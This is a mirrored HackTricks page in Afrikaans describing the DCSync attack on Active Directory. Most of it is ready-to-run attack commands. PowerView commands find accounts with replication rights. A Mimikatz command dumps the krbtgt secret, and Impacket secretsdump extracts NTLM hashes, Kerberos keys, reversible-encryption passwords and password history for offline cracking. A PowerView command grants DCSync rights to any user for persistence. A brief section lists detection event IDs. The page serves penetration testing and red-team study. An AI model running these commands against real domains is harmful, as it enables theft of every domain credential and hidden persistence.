Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/dcsync.md

6.9 KiB
Raw Blame History

DCSync


Gebruik Trickest om maklik werkstrome te bou en te outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapshulpmiddels.
Kry Toegang Vandag:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

DCSync

Die DCSync-toestemming impliseer dat hierdie toestemmings oor die domein self beskik word: DS-Replication-Get-Changes, Replicating Directory Changes All en Replicating Directory Changes In Filtered Set.

Belangrike Notas oor DCSync:

  • Die DCSync-aanval simuleer die gedrag van 'n Domeinbeheerder en vra ander Domeinbeheerders om inligting te repliseer deur die Directory Replication Service Remote Protocol (MS-DRSR) te gebruik. Omdat MS-DRSR 'n geldige en noodsaaklike funksie van Active Directory is, kan dit nie afgeskakel of gedeaktiveer word nie.
  • Standaard het slegs die Domeinadministrateurs, Ondernemingsadministrateurs, Administrateurs en Domeinbeheerders-groepe die nodige voorregte.
  • As enige rekeningwagwoorde met omkeerbare versleuteling gestoor word, is daar 'n opsie in Mimikatz beskikbaar om die wagwoord in te duidelike teks terug te gee.

Enumerasie

Kyk wie hierdie toestemmings het deur powerview te gebruik:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Exploiteer Lokaal

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Exploiteer Afstandsbeheer

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking

-just-dc genereer 3 lêers:

  • een met die NTLM-hashes
  • een met die Kerberos-sleutels
  • een met die wagwoorde in teksformaat van die NTDS vir enige rekeninge wat ingestel is met omkeerbare versleuteling geaktiveer. Jy kan gebruikers met omkeerbare versleuteling kry met
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Volharding

As jy 'n domein-admin is, kan jy hierdie regte aan enige gebruiker toeken met behulp van powerview:

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose

Dan kan jy kontroleer of die gebruiker korrek toegewys is die 3 voorregte deur na hulle te soek in die uitset van (jy behoort die name van die voorregte binne die "ObjectType" veld te sien):

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}

Mitigering

  • Sekuriteitsgebeurtenis ID 4662 (Auditeerbeleid vir objek moet geaktiveer wees) - 'n Operasie is uitgevoer op 'n objek
  • Sekuriteitsgebeurtenis ID 5136 (Auditeerbeleid vir objek moet geaktiveer wees) - 'n Gidsdiensobjek is gewysig
  • Sekuriteitsgebeurtenis ID 4670 (Auditeerbeleid vir objek moet geaktiveer wees) - Toestemmings op 'n objek is verander
  • AD ACL-skandeerder - Skep en vergelyk skep verslae van ACL's. https://github.com/canix1/ADACLScanner

Verwysings

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:


Gebruik Trickest om maklik te bou en outomatiseer werkafvloei aangedryf deur die wêreld se mees gevorderde gemeenskapshulpmiddels.
Kry Vandag Toegang:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}